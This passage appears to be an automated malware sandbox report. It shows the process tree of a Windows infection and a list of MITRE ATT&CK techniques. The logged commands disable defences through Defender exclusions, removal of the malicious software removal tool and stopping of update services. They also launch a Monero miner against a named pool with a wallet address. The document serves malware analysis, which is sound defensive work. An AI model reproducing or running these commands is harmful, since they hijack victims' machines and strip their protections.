        "C:\Users\Admin\AppData\Local\Temp\10223500101\528f7b6e30.exe"
        6⤵
        
        PID:1092
      - C:\Users\Admin\AppData\Local\Temp\10223510101\dBKUxeI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223510101\dBKUxeI.exe"
        6⤵
        
        PID:560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\backup.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\backup\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3728
      - C:\Users\Admin\AppData\Local\Temp\10223520101\Esu6YYl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223520101\Esu6YYl.exe"
        6⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\10223520101\Esu6YYl.exe
        
        C:\Users\Admin\AppData\Local\Temp\10223520101\Esu6YYl.exe curl.dll
        7⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\10223520101\Esu6YYl.exe
        
        C:\Users\Admin\AppData\Local\Temp\10223520101\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        7⤵
        
        PID:3216
      - C:\Users\Admin\AppData\Local\Temp\10223530101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223530101\zY9sqWs.exe"
        6⤵
        
        PID:4072
      - C:\Users\Admin\AppData\Local\Temp\10223540101\HmngBpR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223540101\HmngBpR.exe"
        6⤵
        
        PID:3448

C:\ProgramData\WindowsServices\WindowsAutHost
C:\ProgramData\WindowsServices\WindowsAutHost
1⤵
PID:3016
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2580
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:884
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1716
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1420
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1976
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3068
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2924
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2880
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2144
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3052
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2064
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:2932
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1280
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:1460

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7669856215293197291306718199-7629497011298648251-580000192541784711698616102"
1⤵
PID:2484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion